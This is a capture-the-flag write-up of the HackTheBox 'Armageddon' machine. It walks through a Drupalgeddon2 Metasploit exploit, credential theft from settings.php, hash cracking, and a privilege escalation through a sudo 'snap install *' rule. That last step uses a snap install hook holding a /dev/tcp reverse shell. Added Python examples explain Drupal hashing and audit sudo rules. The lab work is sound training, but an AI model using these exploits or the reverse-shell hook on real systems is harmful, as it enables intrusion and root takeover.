HackTheBox Writeup: Armageddon

Hacktivities
4 min read, Jul 24, 2021

This was an easy-difficulty Linux box that involved exploiting a well-known vulnerability in the Drupal 7 CMS and escalating privileges by abusing a sudo rule that allowed snap install to run as root.

Enumeration

I started enumerating the target machine by performing a quick scan with NMAP to identify any open ports:

nmap -T5 --open -sS -vvv --min-rate=300 --max-retries=3 -p- -oN all-ports-nmap-report 10.10.10.233

PORT   STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63

The scan identified two open ports (22 and 80). I next used NMAP to identify the services running on each port and ran the default NSE scripts (-sC) to look for common, easily exploitable weaknesses:

nmap -sV -sC -Pn -v -p 22,80 -oN nmap-report 10.10.10.233

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon

I can see that there is a website hosted on port 80 and that Drupal 7 is being used. There are also a number of entries disallowed in the robots.txt file.

HTTP — Port 80 Analysis

Visiting the website hosted on port 80, I am presented with a login page:

Website Login Page

I worked through the paths listed in robots.txt first and found the exact Drupal version in use at the top of CHANGELOG.txt:

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.

A quick search online for this version reveals an exploit called drupalgeddon2. The name of the machine (Armageddon) also hints at it. I can use the Metasploit framework to run this exploit and get a meterpreter shell:

msf5 > search drupal
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 10.10.10.233
rhosts => 10.10.10.233
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 10.10.15.15:4444
[*] Sending stage (38288 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.15.15:4444 -> 10.10.10.233:56162) at 2021-06-09 17:12:18 -0400
meterpreter >

I started looking for a way to escalate my privileges in order to get the user flag. In Drupal, the file that contains the database credentials is sites/default/settings.php, and it was readable from the web shell. I found the following credentials:

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

I switched from meterpreter to a regular shell using the shell command and logged in to the MySQL database using the credentials found above. I then started working through the drupal database tables and examined the users table:

mysql -u drupaluser -p
Enter password: CQHEy@9M*m23gBVj
use drupal;
select * from users;
# Filtered Output
brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

Looking through the table, I found a user called brucetherealadmin and the hashed password for that user. I used hashcat to crack the Drupal 7 hash (mode 7900) against the rockyou wordlist and recover the password:

# -m 7900 : Drupal 7
hashcat64.exe -m 7900 -a 0 hash.txt rockyou.txt -o cracked.txt

# Output
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
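To show what hashcat mode 7900 is actually computing, here is an added Python example (written for this writeup; it is not code from the post, from Drupal or from hashcat) that parses the $S$ header of a Drupal 7 hash and recomputes it. The salt, round count and hash are the ones from the users table above, and the candidate password is the one hashcat recovered.

```python
import hashlib
import hmac

# Drupal's phpass-style alphabet; NOT the standard base64 alphabet.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55  # Drupal 7 truncates the stored hash to 55 chars

# The hash found in the users table above (see the mysql output).
STORED_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"


def _drupal_b64(data: bytes) -> str:
    """phpass base64: 3 input bytes -> 4 chars, bits taken little-endian."""
    out = []
    for j in range(0, len(data), 3):
        chunk = data[j:j + 3]
        value = int.from_bytes(chunk, "little")
        for k in range(len(chunk) + 1):   # a 1- or 2-byte tail gives 2 or 3 chars
            out.append(ITOA64[(value >> (6 * k)) & 0x3F])
    return "".join(out)


def parse_drupal7_hash(stored: str) -> dict:
    """Split '$S$' + one count char + 8-char salt + encoded digest."""
    if len(stored) != DRUPAL_HASH_LENGTH or not stored.startswith("$S$"):
        raise ValueError("not a Drupal 7 $S$ hash")
    count_log2 = ITOA64.index(stored[3])      # 'D' -> 15, i.e. 2**15 rounds
    return {"count_log2": count_log2, "iterations": 1 << count_log2,
            "salt": stored[4:12], "digest": stored[12:]}


def drupal7_hash(password: str, stored: str) -> str:
    """Recompute the hash using the setting (first 12 chars) of `stored`."""
    info = parse_drupal7_hash(stored)
    pw = password.encode()
    digest = hashlib.sha512(info["salt"].encode() + pw).digest()
    for _ in range(info["iterations"]):      # 2**count_log2 further rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (stored[:12] + _drupal_b64(digest))[:DRUPAL_HASH_LENGTH]


def drupal7_check(password: str, stored: str) -> bool:
    """Constant-time comparison, as Drupal's own login check does."""
    return hmac.compare_digest(drupal7_hash(password, stored), stored)


if __name__ == "__main__":
    info = parse_drupal7_hash(STORED_HASH)
    print(f"salt={info['salt']} rounds=2^{info['count_log2']}")
    print("booboo matches:", drupal7_check("booboo", STORED_HASH))
```

The header exposes the work factor: 'D' means 2^15 SHA-512 rounds per guess, which is cheap enough that any leaked users table with dictionary passwords falls to a wordlist attack, so protecting settings.php and the database matters more than the hash algorithm.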

Using these credentials, I can SSH into the target machine and get the user flag:

$ ssh brucetherealadmin@10.10.10.233
[brucetherealadmin@armageddon ~]$ cat user.txt
806b7a775ae8a........

Privilege Escalation

Checking the sudo privileges for the current user I am logged in as, I can see that the user brucetherealadmin can run the binary /usr/bin/snap install * with root privileges:

$ sudo -l
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
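To make the problem with this rule concrete, here is an added Python example (my own, not from the writeup or from sudo) that parses sudo -l output, flags NOPASSWD and wildcard rules, and uses a simplified matcher to show why "snap install *" also admits the --dangerous --devmode flags the writeup passes to snap: sudoers compares the arguments as one space-joined string, so the wildcard spans word boundaries.

```python
import re
from fnmatch import fnmatchcase

# Constructed sample: the `sudo -l` output quoted above, as sudo prints it.
SUDO_L_OUTPUT = """\
User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
"""

# "(runas) TAG: TAG: /path args, /path2 args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> list:
    """Return one dict per permitted command from `sudo -l` output."""
    rules, in_cmds = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = RULE_RE.match(line) if in_cmds and line.strip() else None
        if not m:
            continue
        tags = set(m.group("tags").replace(":", " ").split())
        for cmd in m.group("cmds").split(", "):
            rules.append({"runas": m.group("runas"), "tags": tags, "command": cmd.strip()})
    return rules


def rule_allows(rule: dict, argv: list) -> bool:
    """Simplified sudoers matching: the argument list is compared as ONE
    space-joined string, so a trailing '*' also matches extra arguments."""
    if rule["command"] == "ALL":
        return True
    return fnmatchcase(" ".join(argv), rule["command"])


def audit(rules: list) -> list:
    """Flag the two properties that make the rule above abusable."""
    findings = []
    for r in rules:
        problems = []
        if "NOPASSWD" in r["tags"]:
            problems.append("no password required")
        if any(c in r["command"] for c in "*?["):
            problems.append("wildcard in arguments (matches across word boundaries)")
        if problems:
            findings.append({"command": r["command"], "runas": r["runas"], "problems": problems})
    return findings
```

The fix on a real host is to drop the wildcard (or restrict it to a fixed snap name and path) and, where snap install must be delegated at all, to keep password prompting so the rule cannot be used silently.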

I can exploit this to escalate my privileges to root: using fpm, I build a snap package whose install hook (which snapd runs as root during installation) spawns a reverse shell, as seen below:

# Setup the install hook
mkdir -p ./meta/hooks
# The script we want to execute as root
printf '#!/bin/bash\nbash -c "bash -i >& /dev/tcp/<IP>/4444 0>&1"\n' > ./meta/hooks/install
# Build the snap package
chmod a+x ./meta/hooks/install
fpm -n revshell -s dir -t snap -a all ./meta

I set up a listener on my attacking machine, copied the reverse shell snap package onto the target machine and installed it with root privileges through the permitted sudo command /usr/bin/snap install *.

# This requires the --dangerous flag because the snap is not signed by the Snap Store.
# The --devmode flag acknowledges that you are installing an unconfined application.
sudo snap install revshell_1.0_all.snap --dangerous --devmode

I receive a shell with root privileges on my listener and can now get the root flag:

bash-4.3# cat root/root.txt
9b50a94800077........

Final Thoughts

I enjoyed working through this machine and learning how to abuse a sudo rule for /usr/bin/snap install * to escalate my privileges. This was another easy box that gave beginners a good opportunity to refine their testing methodology and pick up some new skills around exploiting vulnerable content management software and privilege escalation techniques.
